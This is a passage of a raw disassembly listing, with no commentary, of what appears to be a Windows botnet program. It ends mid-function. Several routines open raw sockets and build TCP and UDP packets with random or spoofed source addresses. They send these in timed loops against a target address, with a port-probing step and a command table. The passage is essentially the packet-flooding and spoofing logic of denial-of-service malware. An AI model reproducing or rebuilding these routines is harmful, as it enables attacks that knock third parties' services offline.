push eax
movzx eax, [ebp+var_62]
push eax
movzx eax, [ebp+var_63]
push eax
movzx eax, [ebp+var_64]
push eax
lea eax, [ebp+Dest]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 18h
jmp short loc_4150FB
; ---------------------------------------------------------------------------
loc_4150E8: ; CODE XREF: sub_41500F+7E�j
lea eax, [ebp+Dest]
push offset byte_4CEB60 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_4150FB: ; CODE XREF: sub_41500F+D7�j
lea eax, [ebp+Dest]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_C], eax
mov eax, [ebp+var_58]
and al, 45h
push esi
or al, 45h
mov [ebp+var_54], 10h
mov [ebp+var_58], eax
call dword_4CB9D4 ; htons
mov [ebp+var_52], ax
call _rand
mov [ebp+var_50], ax
mov eax, [ebp+var_C]
mov [ebp+var_48], eax
mov eax, [ebp+arg_194]
mov [ebp+var_4E], 40h
mov [ebp+var_4C], 40h
mov [ebp+var_4B], 6
mov [ebp+var_4A], bx
mov [ebp+var_44], eax
call _rand
mov [ebp+var_40], ax
call _rand
mov [ebp+var_3E], ax
call _rand
mov [ebp+var_3C], eax
call _rand
mov [ebp+var_38], eax
mov eax, [ebp+var_34]
and ax, 0FF50h
push 14h
or al, 50h
mov byte ptr [ebp+var_34+2], 18h
mov word ptr [ebp+var_34], ax
mov ax, [ebp+var_3E]
mov [ebp+var_76], ax
mov eax, [ebp+var_44]
mov [ebp+var_74], eax
lea eax, [ebp+var_58]
push eax
mov [ebp+var_30], 787Dh
mov [ebp+var_2E], bx
mov [ebp+var_2C], bx
mov [ebp+var_78], 2
call sub_414F05
mov [ebp+var_4A], ax
lea eax, [ebp+var_58]
push 28h
push eax
call sub_414F05
mov eax, [ebp+var_48]
add esp, 10h
mov [ebp+var_AC], eax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], bl
mov [ebp+var_A3], 6
call ds:dword_4271F4 ; htons
mov [ebp+var_A2], ax
lea eax, [ebp+Src]
push 14h ; Size
push eax ; Src
lea eax, [ebp+var_40]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_8C]
push edi ; Size
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_AC]
push 598h
push eax
call sub_414F05
add esp, 20h
mov [ebp+var_2E], ax
push 10h
lea eax, [ebp+var_78]
push eax
push ebx
lea eax, [ebp+var_58]
push esi
push eax
push [ebp+var_8]
call dword_4CBA38 ; sendto
inc [ebp+var_4]
jmp loc_415069
; ---------------------------------------------------------------------------
loc_415249: ; CODE XREF: sub_41500F+72�j
push [ebp+var_8]
call dword_4CBA6C ; closesocket
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41500F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41525A proc near ; DATA XREF: sub_401ACD+4B97�o
Dest = byte ptr -414h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+arg_0]
push esi
mov eax, 85h
push edi
mov ecx, eax
mov esi, edx
lea edi, [ebp+var_214]
sub esp, 214h
rep movsd
mov ecx, eax
lea esi, [ebp+var_214]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_4152D1
add esp, 214h
push eax
lea eax, [ebp+Dest]
push offset asc_437C8C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
add esp, 14h
push 0
call ds:dword_4270D4 ; ExitThread
sub_41525A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4152D1(int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_4152D1 proc near ; CODE XREF: sub_41525A+3B�p
Dest = byte ptr -254h
var_54 = byte ptr -54h
Dst = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
Str = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
mov ebx, 0FFh
push edi
push ebx
push 3
push 2
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_41530F
lea eax, [ebp+Dest]
push offset asc_437E7C ; "-"
push eax ; Dest
call _sprintf
pop ecx
xor edi, edi
pop ecx
jmp loc_4155D8
; ---------------------------------------------------------------------------
loc_41530F: ; CODE XREF: sub_4152D1+22�j
lea ecx, [ebp+var_14]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_14], 1
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_41533B
call dword_4CB968 ; WSAGetLastError
push eax
push offset unk_437E2C
jmp short loc_415356
; ---------------------------------------------------------------------------
loc_41533B: ; CODE XREF: sub_4152D1+5A�j
lea eax, [ebp+arg_4]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_41536A
call dword_4CB968 ; WSAGetLastError
push eax
push offset asc_437DE8 ; "-"
loc_415356: ; CODE XREF: sub_4152D1+68�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4155D8
; ---------------------------------------------------------------------------
loc_41536A: ; CODE XREF: sub_4152D1+77�j
push edi
mov [ebp+var_24], 2
call dword_4CB9D4 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_4271F0 ; inet_addr
mov esi, ds:dword_4270B0
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Dest]
push offset asc_437DBC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_4153D3
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_208] ; int
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_4153D3: ; CODE XREF: sub_4152D1+E0�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+Str]
push eax ; Str
call _atoi
cmp esi, eax
pop ecx
ja loc_41558E
mov esi, 41Ch
jmp short loc_415407
; ---------------------------------------------------------------------------
loc_415402: ; CODE XREF: sub_4152D1+2B7�j
mov ebx, 0FFh
loc_415407: ; CODE XREF: sub_4152D1+12F�j
cmp dword_4CF180, edi
jnz short loc_415461
push 10h
pop eax
mov [ebp+var_10], eax
push eax ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4CB978 ; getsockname
push ebx
push 1
call sub_418BD1
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 18h
jmp short loc_415471
; ---------------------------------------------------------------------------
loc_415461: ; CODE XREF: sub_4152D1+13C�j
lea eax, [ebp+var_54]
push offset byte_4CEB60 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_415471: ; CODE XREF: sub_4152D1+18E�j
push esi
mov byte_4CED60, 45h
call dword_4CB9D4 ; htons
mov word_4CED62, ax
lea eax, [ebp+var_54]
push eax
mov word_4CED64, 1
mov word_4CED66, di
mov byte_4CED68, 80h
mov byte_4CED69, 11h
mov word_4CED6A, di
call dword_4CBA14 ; inet_addr
mov dword_4CED6C, eax
mov eax, [ebp+var_20]
mov dword_4CED70, eax
lea eax, [ebp+arg_84]
push eax ; Str
mov word_4CED7A, di
call _atoi
test eax, eax
pop ecx
jnz short loc_4154E9
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_4154F7
; ---------------------------------------------------------------------------
loc_4154E9: ; CODE XREF: sub_4152D1+206�j
lea eax, [ebp+arg_84]
push eax ; Str
call _atoi
pop ecx
push eax
loc_4154F7: ; CODE XREF: sub_4152D1+216�j
call dword_4CB9D4 ; htons
mov word_4CED76, ax
call _rand
cdq
mov ecx, 401h
push 408h
idiv ecx
mov word_4CED74, dx
call dword_4CB9D4 ; htons
push 400h ; Size
mov word_4CED78, ax
call _rand
cdq
idiv ebx
push edx ; Val
push offset dword_4CED7C ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_24]
push 10h
push eax
push edi
push esi
push offset byte_4CED60
push [ebp+var_C]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_415607
inc [ebp+var_4]
call ds:dword_4270B0 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+Str]
push eax ; Str
call _atoi
cmp ebx, eax
pop ecx
jbe loc_415402
loc_41558E: ; CODE XREF: sub_4152D1+124�j
push [ebp+var_C]
call dword_4CBA6C ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+Str]
push eax ; Str
imul esi, 41Ch
call _atoi
pop ecx
xor edx, edx
mov ecx, eax
mov eax, esi
shr eax, 0Ah
div ecx
shr esi, 14h
push eax
push esi
push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
push offset asc_437D58 ; "-"
loc_4155C9: ; CODE XREF: sub_4152D1+34A�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 18h
loc_4155D8: ; CODE XREF: sub_4152D1+39�j
; sub_4152D1+94�j
cmp [ebp+arg_20C], edi
jnz short loc_415600
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_208] ; int
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
loc_415600: ; CODE XREF: sub_4152D1+30D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_415607: ; CODE XREF: sub_4152D1+28B�j
push [ebp+var_4]
push esi
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
push offset unk_437CCC
jmp short loc_4155C9
sub_4152D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41561D proc near ; DATA XREF: sub_401ACD+6283�o
Dest = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_190]
push eax ; Str
call _atoi
pop ecx
push eax
lea eax, [ebp+var_210]
push eax
call dword_4CBA14 ; inet_addr
push eax
call sub_4157BA
add esp, 0Ch
push eax
lea eax, [ebp+Dest]
push offset asc_437EA8 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4156B2
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_214] ; int
call sub_409869
add esp, 14h
loc_4156B2: ; CODE XREF: sub_41561D+73�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_41561D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156D1 proc near ; CODE XREF: sub_4157BA+194�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_4156FA
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4271F8 ; connect
jmp loc_4157B6
; ---------------------------------------------------------------------------
loc_4156FA: ; CODE XREF: sub_4156D1+13�j
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
mov [ebp+var_8], edi
call ds:dword_4271E0 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4CB97C ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call dword_4CB9BC ; select
test eax, eax
jnz short loc_41575E
or eax, 0FFFFFFFFh
jmp short loc_4157B6
; ---------------------------------------------------------------------------
loc_41575E: ; CODE XREF: sub_4156D1+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_415769
loc_415765: ; CODE XREF: sub_4156D1+B8�j
; sub_4156D1+DC�j
mov eax, edi
jmp short loc_4157B6
; ---------------------------------------------------------------------------
loc_415769: ; CODE XREF: sub_4156D1+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jnz short loc_41578B
lea eax, [ebp+var_210]
push eax
push esi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jz short loc_415765
loc_41578B: ; CODE XREF: sub_4156D1+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call ds:dword_4271C8 ; getsockopt
cmp eax, edi
jz short loc_415765
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_4157B6: ; CODE XREF: sub_4156D1+24�j
; sub_4156D1+8B�j ...
pop edi
pop esi
leave
retn
sub_4156D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4157BA proc near ; CODE XREF: sub_41561D+51�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = dword ptr -98h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
push 1
pop eax
xor ebx, ebx
push eax
push ebx
push ebx
push 0FFh
push 3
push 2
mov [ebp+var_14], eax
call ds:dword_4271C4 ; WSASocketA
lea ecx, [ebp+var_14]
push 4
push ecx
push 2
push ebx
push eax
mov dword_4CF1F0, eax
call dword_4CB9B4 ; setsockopt
mov esi, ds:dword_4270B0
call esi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
xor eax, eax
push 19h
lea edi, [ebp+var_100]
pop ecx
mov [ebp+var_10C], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_108], ebx
mov [ebp+var_104], ebx
mov [ebp+var_8C], 401h
mov [ebp+var_88], 15h
mov [ebp+var_84], 16h
mov [ebp+var_80], 17h
mov [ebp+var_78], 35h
mov [ebp+var_74], 50h
mov [ebp+var_70], 51h
mov [ebp+var_6C], 58h
mov [ebp+var_68], 6Eh
mov [ebp+var_64], 71h
mov [ebp+var_60], 77h
mov [ebp+var_5C], 87h
mov [ebp+var_58], 89h
mov [ebp+var_54], 8Bh
mov [ebp+var_50], 8Fh
mov [ebp+var_4C], 1BBh
mov [ebp+var_48], 1BDh
mov [ebp+var_44], 400h
mov [ebp+var_40], 599h
mov [ebp+var_3C], 5DCh
mov [ebp+var_38], 6B8h
mov [ebp+var_34], 0CEAh
mov [ebp+var_30], 0D3Dh
mov [ebp+var_2C], 1388h
mov [ebp+var_28], 1A0Bh
mov [ebp+var_24], 1F40h
mov [ebp+var_20], 1F90h
rep stosd
mov [ebp+var_10], ebx
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], ebx
loc_415900: ; CODE XREF: sub_4157BA+1C1�j
mov eax, [ebp+arg_0]
mov [ebp+var_9C], 2
mov [ebp+var_98], eax
mov eax, [ebp+var_4]
lea edi, [ebp+eax+var_8C]
mov ax, word ptr [ebp+eax+var_8C]
push eax
call dword_4CB9D4 ; htons
push ebx
push 1
push 2
mov [ebp+var_9A], ax
call dword_4CBA54 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_C], eax
push ecx
lea ecx, [ebp+var_9C]
push 10h
push ecx
push eax
call sub_4156D1
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call dword_4CBA6C ; closesocket
cmp [ebp+var_8], ebx
jnz short loc_415973
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_10C], eax
loc_415973: ; CODE XREF: sub_4157BA+1AB�j
add [ebp+var_4], 4
cmp [ebp+var_4], 70h
jl short loc_415900
mov edi, offset byte_4CF1F4
push offset asc_42CDC0 ; " "
push edi ; Dest
call _sprintf
pop ecx
pop ecx
call esi ; GetTickCount
mov [ebp+var_C], eax
lea eax, [ebp+var_10C]
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
loc_4159A0: ; CODE XREF: sub_4157BA+23C�j
call esi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_4159F8
mov eax, [ebp+var_8]
mov eax, [eax]
cmp eax, ebx
jz short loc_4159D1
push eax
push edi
push offset aSD ; "%s%d "
push edi ; Dest
mov [ebp+var_10], eax
call _sprintf
add esp, 10h
jmp short loc_4159EB
; ---------------------------------------------------------------------------
loc_4159D1: ; CODE XREF: sub_4157BA+200�j
push 0FFFFh
push ebx
call sub_418BD1
pop ecx
pop ecx
push eax
call dword_4CB9D4 ; htons
movzx eax, ax
mov [ebp+var_10], eax
loc_4159EB: ; CODE XREF: sub_4157BA+215�j
inc [ebp+var_4]
add [ebp+var_8], 4
cmp [ebp+var_4], 1Ch
jl short loc_4159A0
loc_4159F8: ; CODE XREF: sub_4157BA+1F7�j
; sub_4157BA+477�j
push 28h ; Size
push ebx ; Val
push offset byte_4CF190 ; Dst
call _memset
mov esi, 0FFFFh
mov byte_4CF190, 45h
push esi
push 400h
mov byte_4CF199, 6
mov byte_4CF191, 8
call sub_418BD1
add esp, 14h
push eax
call dword_4CB9D4 ; htons
push 28h
mov word_4CF194, ax
call dword_4CB9D4 ; htons
or byte_4CF198, 0FFh
cmp dword_4CF180, ebx
mov word_4CF192, ax
mov word_4CF196, bx
jnz short loc_415A78
push 0FFFEh
push 1
call sub_418BD1
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
shl eax, 10h
and ecx, esi
or eax, ecx
jmp short loc_415A83
; ---------------------------------------------------------------------------
loc_415A78: ; CODE XREF: sub_4157BA+2A2�j
push offset byte_4CEB60
call dword_4CBA14 ; inet_addr
loc_415A83: ; CODE XREF: sub_4157BA+2BC�j
mov dword_4CF19C, eax
mov eax, [ebp+arg_0]
push 4000h
mov dword_4CF1A0, eax
mov byte_4CF1B1, bl
call dword_4CB9D4 ; htons
push esi
push ebx
mov word_4CF1B2, ax
call sub_418BD1
mov edi, eax
push esi
push ebx
shl edi, 8
call sub_418BD1
add esp, 10h
add edi, eax
push edi
call dword_4CB9D0 ; htonl
mov dword_4CF1A8, eax
mov al, byte_4CF1B0
mov edi, [ebp+arg_0]
and al, 0Fh
or al, 50h
push 14h
mov byte_4CF1B0, al
mov ax, word ptr [ebp+var_10]
mov dword_4CF1AC, ebx
mov word_4CF1B6, bx
mov word_4CF1A6, ax
mov dword_4CF1CC, edi
mov byte_4CF1D0, bl
mov byte_4CF1D1, 6
call dword_4CB9D4 ; htons
mov word_4CF1D2, ax
mov ax, word_4CF1A6
mov word_4CF1B8, 2
mov dword_4CF1BC, edi
mov word_4CF1BA, ax
mov [ebp+var_4], ebx
jmp short loc_415B39
; ---------------------------------------------------------------------------
loc_415B34: ; CODE XREF: sub_4157BA+451�j
mov esi, 0FFFFh
loc_415B39: ; CODE XREF: sub_4157BA+378�j
cmp [ebp+var_4], ebx
jnz short loc_415B6D
push esi
push ebx
call sub_418BD1
pop ecx
pop ecx
push eax
call dword_4CB9D4 ; htons
mov word_4CF1A4, ax
mov eax, dword_4CF19C
mov dword_4CF1C8, eax
mov byte_4CF1B1, 2
mov dword_4CF1AC, ebx
jmp short loc_415B8C
; ---------------------------------------------------------------------------
loc_415B6D: ; CODE XREF: sub_4157BA+382�j
push esi
push ebx
mov byte_4CF1B1, 10h
call sub_418BD1
pop ecx
pop ecx
push eax
call dword_4CB9D4 ; htons
movzx eax, ax
mov dword_4CF1AC, eax
loc_415B8C: ; CODE XREF: sub_4157BA+3B1�j
inc word_4CF194
inc dword_4CF1A8
mov ax, word_4CF1A6
push 5
pop ecx
mov esi, offset word_4CF1A4
mov edi, offset dword_4CF1D4
mov word_4CF19A, bx
mov word_4CF1B4, bx
push 14h
rep movsd
mov esi, offset byte_4CF190
mov word_4CF1BA, ax
push esi
call sub_40AA5F
push 20h
push offset dword_4CF1C8
mov word_4CF19A, ax
call sub_40AA5F
add esp, 10h
mov word_4CF1B4, ax
push 10h
push offset word_4CF1B8
push ebx
push 28h
push esi
push dword_4CF1F0
call dword_4CBA38 ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_415B34
call ds:dword_4270B0 ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja short loc_415C36
push [ebp+arg_8]
call ds:dword_427080 ; Sleep
jmp loc_4159F8
; ---------------------------------------------------------------------------
loc_415C36: ; CODE XREF: sub_4157BA+46C�j
pop edi
pop esi
mov eax, offset byte_4CF1F4
pop ebx
leave
retn
sub_4157BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415C40(char *Str2,int)
sub_415C40 proc near ; CODE XREF: sub_401ACD+7111�p
var_4 = dword ptr -4
Str2 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_43DB90
mov edi, 0B8h
loc_415C54: ; CODE XREF: sub_415C40+33�j
cmp byte ptr [esi], 0
jz short loc_415C77
push [ebp+Str2] ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_415C77
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_43E710
jl short loc_415C54
jmp short loc_415CB9
; ---------------------------------------------------------------------------
loc_415C77: ; CODE XREF: sub_415C40+17�j
; sub_415C40+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi ; Size
push 0 ; Val
lea ebx, dword_43DB90[esi]
push ebx ; Dst
call _memset
push 17h ; Count
push [ebp+Str2] ; Source
push ebx ; Dest
call _strncpy
push 9Fh ; Count
lea eax, dword_43DBA8[esi]
push [ebp+arg_4] ; Source
push eax ; Dest
call _strncpy
add esp, 24h
inc dword_4294CC
pop ebx
loc_415CB9: ; CODE XREF: sub_415C40+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_415C40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415CC0(int,char *Str,int)
sub_415CC0 proc near ; CODE XREF: sub_401ACD+289A�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push offset dword_437EF0 ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 14h
xor edi, edi
mov esi, offset dword_43DB90
loc_415CEA: ; CODE XREF: sub_415CC0+72�j
cmp byte ptr [esi], 0
jz short loc_415D25
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_ ; "%d. "
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 2Ch
loc_415D25: ; CODE XREF: sub_415CC0+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_43E710
jl short loc_415CEA
pop edi
pop esi
leave
retn
sub_415CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D38 proc near ; CODE XREF: WinMain(x,x,x,x)+384�p
; WinMain(x,x,x,x)+408�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_427140 ; GetLocalTime
mov ebx, offset byte_4D35F4
mov edi, 80h
mov esi, offset byte_4CF5F4
loc_415D5A: ; CODE XREF: sub_415D38+3D�j
cmp byte ptr [ebx], 0
jz short loc_415D71
push 7Fh ; Count
lea eax, [ebx+80h]
push ebx ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_415D71: ; CODE XREF: sub_415D38+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_415D5A
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi ; Count
push esi ; Dest
call __snprintf
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_415D38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415DAC(char *Format,char Args)
sub_415DAC proc near ; CODE XREF: sub_4017ED+F7�p
; sub_401ACD:loc_408967�p ...
Dest = byte ptr -80h
Format = dword ptr 8
Args = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 80h ; Count
push eax ; Dest
call __vsnprintf
lea eax, [ebp+Dest]
push eax
call sub_415D38
add esp, 14h
leave
retn
sub_415DAC endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_415DD8(int,char *Str,int,int)
sub_415DD8 proc near ; CODE XREF: sub_401ACD+278E�p
arg_0 = dword ptr 4
Str = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset byte_4CF5F4
xor ecx, ecx
loc_415DDF: ; CODE XREF: sub_415DD8+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset byte_4D35F4
jl short loc_415DDF
cmp [esp+arg_C], ecx
jnz short loc_415E0D
push ecx ; int
push [esp+4+arg_8] ; int
push offset dword_437F3C ; int
push [esp+0Ch+Str] ; Str
push [esp+10h+arg_0] ; int
call sub_409869
add esp, 14h
loc_415E0D: ; CODE XREF: sub_415DD8+19�j
push offset dword_437F28
